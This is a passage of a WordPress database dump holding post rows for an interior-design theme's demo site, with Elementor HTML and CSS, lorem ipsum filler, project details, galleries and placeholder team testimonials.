efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Results</h2>\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n<img width=\"570\" height=\"506\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h3>our gallery</h3>\n<h2>\n								 Photo gallery</h2>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\" alt=\"\">\n</a>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\" alt=\"\">\n</a>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\" alt=\"\">\n</a>','Richard Rogers','','publish','open','closed','','richard-rogers-2','','','2022-06-14 02:54:08','2022-06-14 02:54:08','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_projects&amp;p=665',0,'ova_projects','',0),(4646,1,'2022-06-14 03:00:29','2022-06-14 03:00:29','<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style>\n<h2>Cozy living room</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h4>Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates</h4>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\nService:\n<h4> Interior design</h4>\nArchitect:\n<h4> Mike hardson</h4>\nDuration:\n<h4> 4.5 Months</h4>\nLocation:\n<h4> Broklyn, New York</h4>\n<ul>\n 	<li>\n                        <a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n</ul>\n<h2>Before</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Challenges</h2>\n 	<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n\n<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"570\" height=\"506\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h2>After</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Results</h2>\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n<img width=\"570\" height=\"506\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h3>our gallery</h3>\n<h2>\n								 Photo gallery</h2>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\" alt=\"\">\n</a>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\" alt=\"\">\n</a>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\" alt=\"\">\n</a>','Cozy living room','','publish','open','closed','','cozy-living-room-2','','','2022-06-14 03:00:29','2022-06-14 03:00:29','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_projects&amp;p=677',0,'ova_projects','',0),(4647,1,'2022-06-14 03:02:50','2022-06-14 03:02:50','<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style>\n<h2>Greater commercial</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h4>Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates</h4>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\nService:\n<h4> Interior design</h4>\nArchitect:\n<h4> Mike hardson</h4>\nDuration:\n<h4> 4.5 Months</h4>\nLocation:\n<h4> Broklyn, New York</h4>\n<ul>\n 	<li>\n                        <a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n</ul>\n<h2>Before</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Challenges</h2>\n 	<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n\n<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"570\" height=\"506\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h2>After</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Results</h2>\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n<img width=\"570\" height=\"506\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h3>our gallery</h3>\n<h2>\n								 Photo gallery</h2>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg\" alt=\"\">\n</a>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg\" alt=\"\">\n</a>\n<a href=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg\" alt=\"\">\n</a>','Greater commercial','','publish','open','closed','','greater-commercial-2','','','2022-06-14 03:02:50','2022-06-14 03:02:50','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_projects&amp;p=684',0,'ova_projects','',0),(4652,1,'2022-06-14 10:13:53','2022-06-14 10:13:53','<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Personal experience</h2>		\n		<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden.</p>		\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n				Interior\n									40%\n			<section>\n																																	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Kevin martin\" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Kevin martin</p>\n																																	<p>Customer</p>\n										<!-- end info -->\n																																	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Jessica brown </p>\n																																	<p>Customer</p>\n										<!-- end info -->\n																																	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Mike hardson\" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Mike hardson</p>\n																																	<p>Customer</p>\n										<!-- end info -->\n			</section>\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"370\" height=\"271\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-planning-stage.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-planning-stage.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-planning-stage-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>Planning stage</h2>		\n		<p>There are many variations of passages of psum available but the majority have suffered.</p>		\n			<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Residential interior work\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										Modern design ideas\n									</li>\n						</ul>\n															<img width=\"370\" height=\"271\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-flexible-output.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-flexible-output.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-flexible-output-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>Flexible output</h2>		\n		<p>There are many variations of passages of psum available but the majority have suffered.</p>		\n					<ul>\n							<li>\n										Complete italian wooden works\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										Modern design ideas\n									</li>\n						</ul>\n															<img width=\"370\" height=\"271\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-new-material.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-new-material.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-new-material-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>New material</h2>		\n		There are many variations of passages of psum available but the majority have suffered.		\n					<ul>\n							<li>\n										Residential interior work\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										  Premium quality of full apartment\n									</li>\n						</ul>','Aleesha brown','','publish','closed','closed','','aleesha-brown-2','','','2022-06-14 10:13:53','2022-06-14 10:13:53','',0,'https://demo.ovatheme.com/retirio/?post_type=team&amp;p=930',0,'team','',0),(4653,1,'2022-06-15 03:12:49','2022-06-15 03:12:49','<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Personal experience</h2>		\n		<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden.</p>		\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}</style>			\n				Archirecture\n									85%\n				Designing\n									60%\n				Interior\n									40%\n			<section>\n																																	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Kevin martin\" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Kevin martin</p>\n																																	<p>Customer</p>\n										<!-- end info -->\n																																	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Jessica brown </p>\n																																	<p>Customer</p>\n										<!-- end info -->\n																																	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Mike hardson\" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Mike hardson</p>\n																																	<p>Customer</p>\n										<!-- end info -->\n			</section>\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"370\" height=\"271\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-planning-stage.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-planning-stage.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-planning-stage-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>Planning stage</h2>		\n		<p>There are many variations of passages of psum available but the majority have suffered.</p>		\n			<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Residential interior work\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										Modern design ideas\n									</li>\n						</ul>\n															<img width=\"370\" height=\"271\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-flexible-output.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-flexible-output.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-flexible-output-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>Flexible output</h2>		\n		<p>There are many variations of passages of psum available but the majority have suffered.</p>		\n					<ul>\n							<li>\n										Complete italian wooden works\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										Modern design ideas\n									</li>\n						</ul>\n															<img width=\"370\" height=\"271\" src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-new-material.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-new-material.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-new-material-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>New material</h2>		\n		There are many variations of passages of psum available but the majority have suffered.		\n					<ul>\n							<li>\n										Residential interior work\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										  Premium quality of full apartment\n									</li>\n						</ul>','Kevin martin','','publish','closed','closed','','kevin-martin-2','','','2022-06-15 03:12:49','2022-06-15 03:12:49','',0,'https://demo.ovatheme.com/retirio/?post_type=team&amp;p=1037',0,'team','',0),(4654,1,'2022-06-15 07:23:20','2022-06-15 07:23:20','<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Personal experience</h2>		\n		<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden.</p>		\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n				Interior\n									60%\n			<section>\n																																	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Kevin martin\" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Kevin martin</p>\n																																	<p>Customer</p>\n										<!-- end info -->\n																																	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Jessica brown </p>\n																																	<p>Customer</p>\n										<!-- end info -->\n																																	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Mike hardson\" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Mike hardson</p>\n																																	<p>Customer</p>\n								